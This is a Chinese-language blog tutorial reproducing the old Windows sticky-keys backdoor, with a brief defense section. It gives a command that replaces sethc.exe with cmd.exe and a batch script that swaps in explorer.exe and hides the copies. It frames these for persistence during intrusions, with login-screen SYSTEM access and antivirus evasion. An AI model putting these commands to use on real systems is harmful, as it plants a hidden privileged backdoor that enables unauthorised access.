《老漏洞复现与分析篇》 - 其一 - shift后门
《老漏洞复现与分析篇》 - 其一 - shift后门
引言
因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个“老”字,整一点多年前的老漏洞拿来复现和分析。俗话说得好,要善于总结前人的经验和智慧,才能在自己的前进道路上走得更快。 本系列在我能理解的范围内我都会详细讲解,我不能理解的就靠收集网上的资料了,引用会注明来源和作者,如有侵权请联系我删除。那么废话不多说,开始我们的新篇章,Here we go!
0x01 shift后门
说到这个东西就先提一下它的来源——Windows粘滞键 Windows粘滞键本身是为了不方便同时按组合键的人群使用的功能,在连按5次shift键后打开粘滞键,也就是启动了system32目录下的sethc.exe
在登入状态中,连按5次shift会以当前用户权限执行sethc.exe,而在登录界面还未登录时会默认以system用户(管理员权限)执行。
0x02 原理
原理也很简单,连按5次shift,windows会在system32目录下寻找sethc.exe并启动,我们只需要把cmd或者其他的shell程序替换掉,那么我们启动sethc.exe的时候就会默认以system用户执行我们的cmd,而且因为是系统自带的应用所以不会被杀毒软件检测
0x03 复现
如果我们在渗透过程中拿到较高权限的shell就可以直接在shell里面执行命令
copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe或者在拿到远程桌面后直接在系统里面替换 这里再贴一个用的比较广泛的批处理,具体步骤可以自己分析
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h我这里拿虚拟机做个演示,先打开3389端口
然后复制cmd到system32目录下并且命名sethc.exe,或者可以下载更隐藏的后门软件,我这里用的是黑基2012的后门,隐蔽性更高
替换成功
接下来我们用主机连接远程桌面试试
启动成功,并且为system权限
因为远程桌面存在时间限制自动断开连接,所以需要尽快添加用户
0x04 防御
防御方法其实也很简单粗暴,就是直接设置权限让所有人都用不了,这样无论是删除还是访问都会显示拒绝访问。 注意,这里不是直接删除,删除后系统可能会自动找回。
其实随着时代的发展,系统的更新换代,在权限分级更严格的今天,这种方法对很多系统已经不管用了,不过重要的是学到一个思路,说不定今后还能遇到用得上的地方呢